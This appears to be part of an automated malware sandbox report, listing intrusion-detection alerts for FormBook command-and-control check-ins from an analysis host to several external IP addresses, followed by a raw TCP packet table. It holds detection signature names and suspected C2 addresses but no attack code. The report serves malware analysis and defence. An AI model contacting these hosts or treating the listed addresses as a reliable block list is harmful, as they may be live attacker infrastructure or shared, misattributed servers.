2024-11-12T15:28:33.384396+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49729	84.32.84.32	80	TCP
2024-11-12T15:28:33.384396+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49803	13.248.169.48	80	TCP
2024-11-12T15:28:33.384396+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49770	3.33.130.190	80	TCP
2024-11-12T15:28:33.384396+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49742	13.248.169.48	80	TCP
2024-11-12T15:28:33.384396+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49795	208.91.197.27	80	TCP
2024-11-12T15:28:33.384396+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49794	208.91.197.27	80	TCP
2024-11-12T15:29:49.793779+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49719	206.119.81.121	80	TCP
2024-11-12T15:30:06.488831+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49720	47.52.221.8	80	TCP
2024-11-12T15:30:09.348521+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49721	47.52.221.8	80	TCP
2024-11-12T15:30:12.210301+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49722	47.52.221.8	80	TCP
2024-11-12T15:30:15.088783+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49723	47.52.221.8	80	TCP
2024-11-12T15:30:21.474308+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49724	154.38.64.6	80	TCP
2024-11-12T15:30:24.331656+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49725	154.38.64.6	80	TCP
2024-11-12T15:30:27.179439+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49726	154.38.64.6	80	TCP
2024-11-12T15:30:30.042700+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49727	154.38.64.6	80	TCP
2024-11-12T15:30:44.048299+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49731	84.32.84.32	80	TCP
2024-11-12T15:30:58.706921+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49735	208.91.197.27	80	TCP
2024-11-12T15:31:04.558226+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49736	203.161.49.193	80	TCP
2024-11-12T15:31:07.284661+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49737	203.161.49.193	80	TCP
2024-11-12T15:31:10.014314+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49738	203.161.49.193	80	TCP
2024-11-12T15:31:12.685755+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49739	203.161.49.193	80	TCP
2024-11-12T15:31:18.152174+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49740	13.248.169.48	80	TCP
2024-11-12T15:31:20.831629+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49741	13.248.169.48	80	TCP
2024-11-12T15:31:26.173800+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49743	13.248.169.48	80	TCP
2024-11-12T15:31:31.658239+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49744	173.255.194.134	80	TCP
2024-11-12T15:31:34.323146+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49745	173.255.194.134	80	TCP
2024-11-12T15:31:36.991794+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49746	173.255.194.134	80	TCP
2024-11-12T15:31:39.660092+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49747	173.255.194.134	80	TCP
2024-11-12T15:31:45.115548+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49748	3.33.130.190	80	TCP
2024-11-12T15:31:47.770947+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49749	3.33.130.190	80	TCP
2024-11-12T15:31:50.428894+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49750	3.33.130.190	80	TCP
2024-11-12T15:31:53.081396+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49751	3.33.130.190	80	TCP
2024-11-12T15:32:07.100819+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49755	84.32.84.32	80	TCP
2024-11-12T15:32:12.534225+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49756	108.179.252.152	80	TCP
2024-11-12T15:32:15.183506+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49757	108.179.252.152	80	TCP
2024-11-12T15:32:17.840745+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49758	108.179.252.152	80	TCP
2024-11-12T15:32:20.485752+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49759	108.179.252.152	80	TCP
2024-11-12T15:32:25.974015+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49760	13.248.169.48	80	TCP
2024-11-12T15:32:28.652937+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49761	13.248.169.48	80	TCP
2024-11-12T15:32:33.977187+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49763	13.248.169.48	80	TCP
2024-11-12T15:32:39.496464+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49764	199.59.243.227	80	TCP
2024-11-12T15:32:42.174011+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49765	199.59.243.227	80	TCP
2024-11-12T15:32:44.825126+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49766	199.59.243.227	80	TCP
2024-11-12T15:32:47.491319+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49767	199.59.243.227	80	TCP
2024-11-12T15:32:52.979325+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49768	3.33.130.190	80	TCP
2024-11-12T15:32:55.650387+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49769	3.33.130.190	80	TCP
2024-11-12T15:33:00.987859+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49771	3.33.130.190	80	TCP
2024-11-12T15:33:06.571036+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49772	199.59.243.227	80	TCP
2024-11-12T15:33:09.227658+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49773	199.59.243.227	80	TCP
2024-11-12T15:33:11.888868+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49774	199.59.243.227	80	TCP
2024-11-12T15:33:14.555422+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49775	199.59.243.227	80	TCP
2024-11-12T15:33:20.096458+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49776	199.59.243.227	80	TCP
2024-11-12T15:33:22.757475+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49777	199.59.243.227	80	TCP
2024-11-12T15:33:25.407887+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49778	199.59.243.227	80	TCP
2024-11-12T15:33:28.075926+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49779	199.59.243.227	80	TCP
2024-11-12T15:33:36.804879+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49780	206.119.81.121	80	TCP
2024-11-12T15:33:42.465441+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49781	47.52.221.8	80	TCP
2024-11-12T15:33:45.324228+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49782	47.52.221.8	80	TCP
2024-11-12T15:33:48.182107+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49783	47.52.221.8	80	TCP
2024-11-12T15:33:51.051338+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49784	47.52.221.8	80	TCP
2024-11-12T15:33:56.720136+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49785	154.38.64.6	80	TCP
2024-11-12T15:33:59.564053+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49786	154.38.64.6	80	TCP
2024-11-12T15:34:02.441564+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49787	154.38.64.6	80	TCP
2024-11-12T15:34:05.288592+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49788	154.38.64.6	80	TCP
2024-11-12T15:34:19.147113+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49792	84.32.84.32	80	TCP
2024-11-12T15:34:32.754058+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49796	208.91.197.27	80	TCP
2024-11-12T15:34:38.124306+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49797	203.161.49.193	80	TCP
2024-11-12T15:34:40.832489+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49798	203.161.49.193	80	TCP
2024-11-12T15:34:43.554422+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49799	203.161.49.193	80	TCP
2024-11-12T15:34:46.269429+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49800	203.161.49.193	80	TCP
2024-11-12T15:34:51.562136+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49801	13.248.169.48	80	TCP
2024-11-12T15:34:54.231250+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49802	13.248.169.48	80	TCP
2024-11-12T15:34:59.588414+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49804	13.248.169.48	80	TCP
2024-11-12T15:35:04.884433+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49805	173.255.194.134	80	TCP
2024-11-12T15:35:07.558452+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49806	173.255.194.134	80	TCP
2024-11-12T15:35:10.227186+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49807	173.255.194.134	80	TCP
2024-11-12T15:35:12.897242+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49808	173.255.194.134	80	TCP
2024-11-12T15:35:18.183174+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49809	3.33.130.190	80	TCP
2024-11-12T15:35:20.843610+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49810	3.33.130.190	80	TCP
2024-11-12T15:35:23.491254+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49811	3.33.130.190	80	TCP
2024-11-12T15:35:26.164832+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49812	3.33.130.190	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 12, 2024 15:29:49.160767078 CET	49719	80	192.168.11.20	206.119.81.121
Nov 12, 2024 15:29:49.474054098 CET	80	49719	206.119.81.121	192.168.11.20
Nov 12, 2024 15:29:49.474476099 CET	49719	80	192.168.11.20	206.119.81.121
Nov 12, 2024 15:29:49.480458975 CET	49719	80	192.168.11.20	206.119.81.121
Nov 12, 2024 15:29:49.793432951 CET	80	49719	206.119.81.121	192.168.11.20
Nov 12, 2024 15:29:49.793483973 CET	80	49719	206.119.81.121	192.168.11.20
Nov 12, 2024 15:29:49.793778896 CET	49719	80	192.168.11.20	206.119.81.121
Nov 12, 2024 15:29:49.796294928 CET	49719	80	192.168.11.20	206.119.81.121
Nov 12, 2024 15:29:50.109280109 CET	80	49719	206.119.81.121	192.168.11.20
Nov 12, 2024 15:30:05.845839977 CET	49720	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:30:06.162204981 CET	80	49720	47.52.221.8	192.168.11.20
Nov 12, 2024 15:30:06.162578106 CET	49720	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:30:06.171499014 CET	49720	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:30:06.487807989 CET	80	49720	47.52.221.8	192.168.11.20
Nov 12, 2024 15:30:06.488620996 CET	80	49720	47.52.221.8	192.168.11.20
Nov 12, 2024 15:30:06.488630056 CET	80	49720	47.52.221.8	192.168.11.20
Nov 12, 2024 15:30:06.488831043 CET	49720	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:30:07.685391903 CET	49720	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:30:08.702852964 CET	49721	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:30:09.023015976 CET	80	49721	47.52.221.8	192.168.11.20
Nov 12, 2024 15:30:09.023209095 CET	49721	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:30:09.030860901 CET	49721	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:30:09.346771002 CET	80	49721	47.52.221.8	192.168.11.20
Nov 12, 2024 15:30:09.348335981 CET	80	49721	47.52.221.8	192.168.11.20
Nov 12, 2024 15:30:09.348380089 CET	80	49721	47.52.221.8	192.168.11.20
Nov 12, 2024 15:30:09.348520994 CET	49721	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:30:10.544096947 CET	49721	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:30:11.561528921 CET	49722	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:30:11.882518053 CET	80	49722	47.52.221.8	192.168.11.20
Nov 12, 2024 15:30:11.882735968 CET	49722	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:30:11.890522957 CET	49722	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:30:11.890587091 CET	49722	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:30:12.208352089 CET	80	49722	47.52.221.8	192.168.11.20
Nov 12, 2024 15:30:12.208399057 CET	80	49722	47.52.221.8	192.168.11.20
Nov 12, 2024 15:30:12.210099936 CET	80	49722	47.52.221.8	192.168.11.20
Nov 12, 2024 15:30:12.210155010 CET	80	49722	47.52.221.8	192.168.11.20
Nov 12, 2024 15:30:12.210300922 CET	49722	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:30:13.402925014 CET	49722	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:30:14.422230959 CET	49723	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:30:14.749339104 CET	80	49723	47.52.221.8	192.168.11.20
Nov 12, 2024 15:30:14.749941111 CET	49723	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:30:14.756283045 CET	49723	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:30:15.087992907 CET	80	49723	47.52.221.8	192.168.11.20
Nov 12, 2024 15:30:15.088499069 CET	80	49723	47.52.221.8	192.168.11.20
Nov 12, 2024 15:30:15.088546038 CET	80	49723	47.52.221.8	192.168.11.20
Nov 12, 2024 15:30:15.088783026 CET	49723	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:30:15.090908051 CET	49723	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:30:15.416027069 CET	80	49723	47.52.221.8	192.168.11.20
Nov 12, 2024 15:30:20.830559969 CET	49724	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:30:21.145272970 CET	80	49724	154.38.64.6	192.168.11.20
Nov 12, 2024 15:30:21.145642042 CET	49724	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:30:21.153552055 CET	49724	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:30:21.467226028 CET	80	49724	154.38.64.6	192.168.11.20
Nov 12, 2024 15:30:21.474091053 CET	80	49724	154.38.64.6	192.168.11.20
Nov 12, 2024 15:30:21.474137068 CET	80	49724	154.38.64.6	192.168.11.20
Nov 12, 2024 15:30:21.474308014 CET	49724	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:30:22.666515112 CET	49724	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:30:23.684139967 CET	49725	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:30:24.001275063 CET	80	49725	154.38.64.6	192.168.11.20
Nov 12, 2024 15:30:24.001627922 CET	49725	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:30:24.009607077 CET	49725	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:30:24.324556112 CET	80	49725	154.38.64.6	192.168.11.20
Nov 12, 2024 15:30:24.331356049 CET	80	49725	154.38.64.6	192.168.11.20
Nov 12, 2024 15:30:24.331403017 CET	80	49725	154.38.64.6	192.168.11.20
Nov 12, 2024 15:30:24.331655979 CET	49725	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:30:25.525305033 CET	49725	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:30:26.542649984 CET	49726	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:30:26.853694916 CET	80	49726	154.38.64.6	192.168.11.20
Nov 12, 2024 15:30:26.853944063 CET	49726	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:30:26.861804962 CET	49726	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:30:27.172101974 CET	80	49726	154.38.64.6	192.168.11.20
Nov 12, 2024 15:30:27.172116995 CET	80	49726	154.38.64.6	192.168.11.20
Nov 12, 2024 15:30:27.172352076 CET	80	49726	154.38.64.6	192.168.11.20
Nov 12, 2024 15:30:27.172367096 CET	80	49726	154.38.64.6	192.168.11.20
Nov 12, 2024 15:30:27.172378063 CET	80	49726	154.38.64.6	192.168.11.20
Nov 12, 2024 15:30:27.179158926 CET	80	49726	154.38.64.6	192.168.11.20
Nov 12, 2024 15:30:27.179176092 CET	80	49726	154.38.64.6	192.168.11.20
Nov 12, 2024 15:30:27.179439068 CET	49726	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:30:28.368371010 CET	49726	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:30:29.385793924 CET	49727	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:30:29.703547955 CET	80	49727	154.38.64.6	192.168.11.20
Nov 12, 2024 15:30:29.703753948 CET	49727	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:30:29.708959103 CET	49727	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:30:30.035824060 CET	80	49727	154.38.64.6	192.168.11.20
Nov 12, 2024 15:30:30.042308092 CET	80	49727	154.38.64.6	192.168.11.20
Nov 12, 2024 15:30:30.042378902 CET	80	49727	154.38.64.6	192.168.11.20
Nov 12, 2024 15:30:30.042700052 CET	49727	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:30:30.044773102 CET	49727	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:30:30.383910894 CET	80	49727	154.38.64.6	192.168.11.20
Nov 12, 2024 15:30:35.231637001 CET	49728	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:30:35.473270893 CET	80	49728	84.32.84.32	192.168.11.20
Nov 12, 2024 15:30:35.473546028 CET	49728	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:30:35.481281042 CET	49728	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:30:35.722661018 CET	80	49728	84.32.84.32	192.168.11.20
Nov 12, 2024 15:30:35.723148108 CET	80	49728	84.32.84.32	192.168.11.20
Nov 12, 2024 15:30:38.008907080 CET	49729	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:30:38.246484041 CET	80	49729	84.32.84.32	192.168.11.20
Nov 12, 2024 15:30:38.246707916 CET	49729	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:30:38.254262924 CET	49729	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:30:38.493896008 CET	80	49729	84.32.84.32	192.168.11.20
Nov 12, 2024 15:30:38.493938923 CET	80	49729	84.32.84.32	192.168.11.20
Nov 12, 2024 15:30:40.773901939 CET	49730	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:30:41.013039112 CET	80	49730	84.32.84.32	192.168.11.20
Nov 12, 2024 15:30:41.013288021 CET	49730	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:30:41.021265030 CET	49730	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:30:41.021328926 CET	49730	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:30:41.265213966 CET	80	49730	84.32.84.32	192.168.11.20
Nov 12, 2024 15:30:41.265271902 CET	80	49730	84.32.84.32	192.168.11.20
Nov 12, 2024 15:30:43.554548979 CET	49731	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:30:43.796485901 CET	80	49731	84.32.84.32	192.168.11.20
Nov 12, 2024 15:30:43.796771049 CET	49731	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:30:43.801985025 CET	49731	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:30:44.047930956 CET	80	49731	84.32.84.32	192.168.11.20
Nov 12, 2024 15:30:44.047947884 CET	80	49731	84.32.84.32	192.168.11.20
Nov 12, 2024 15:30:44.047967911 CET	80	49731	84.32.84.32	192.168.11.20
Nov 12, 2024 15:30:44.047979116 CET	80	49731	84.32.84.32	192.168.11.20
Nov 12, 2024 15:30:44.047987938 CET	80	49731	84.32.84.32	192.168.11.20
Nov 12, 2024 15:30:44.048012018 CET	80	49731	84.32.84.32	192.168.11.20
Nov 12, 2024 15:30:44.048016071 CET	80	49731	84.32.84.32	192.168.11.20
Nov 12, 2024 15:30:44.048028946 CET	80	49731	84.32.84.32	192.168.11.20
Nov 12, 2024 15:30:44.048063993 CET	80	49731	84.32.84.32	192.168.11.20
Nov 12, 2024 15:30:44.048299074 CET	49731	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:30:44.048317909 CET	49731	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:30:44.051441908 CET	49731	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:30:44.294435978 CET	80	49731	84.32.84.32	192.168.11.20
Nov 12, 2024 15:30:49.245290995 CET	49732	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:30:49.383346081 CET	80	49732	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:49.383496046 CET	49732	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:30:49.398493052 CET	49732	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:30:49.535720110 CET	80	49732	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:51.927890062 CET	49733	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:30:52.063993931 CET	80	49733	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:52.064188957 CET	49733	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:30:52.073029995 CET	49733	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:30:52.209322929 CET	80	49733	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:54.599055052 CET	49734	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:30:54.735548019 CET	80	49734	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:54.735872030 CET	49734	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:30:54.744513988 CET	49734	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:30:54.881653070 CET	80	49734	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:57.270281076 CET	49735	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:30:57.407248974 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:57.407464981 CET	49735	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:30:57.412678003 CET	49735	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:30:57.555788994 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.706624985 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.706641912 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.706651926 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.706753969 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.706774950 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.706785917 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.706794977 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.706804991 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.706856012 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.706866980 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.706876993 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.706921101 CET	49735	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:30:58.706921101 CET	49735	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:30:58.707031965 CET	49735	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:30:58.752217054 CET	49735	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:30:58.851485968 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.851543903 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.851586103 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.851628065 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.851700068 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.851743937 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.851784945 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.851825953 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.851867914 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.851910114 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.851950884 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.852088928 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.852150917 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.852195024 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.852236032 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.852278948 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.852293968 CET	49735	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:30:58.852320910 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.852364063 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.852417946 CET	49735	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:30:58.852479935 CET	49735	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:30:58.852479935 CET	49735	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:30:58.852556944 CET	49735	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:30:58.894539118 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.894598961 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.894954920 CET	49735	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:30:58.994703054 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.994764090 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.994827986 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.994872093 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.994914055 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.994950056 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:30:58.994978905 CET	49735	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:30:58.995042086 CET	49735	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:30:58.995143890 CET	49735	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:30:59.000008106 CET	49735	80	192.168.11.20	208.91.197.27
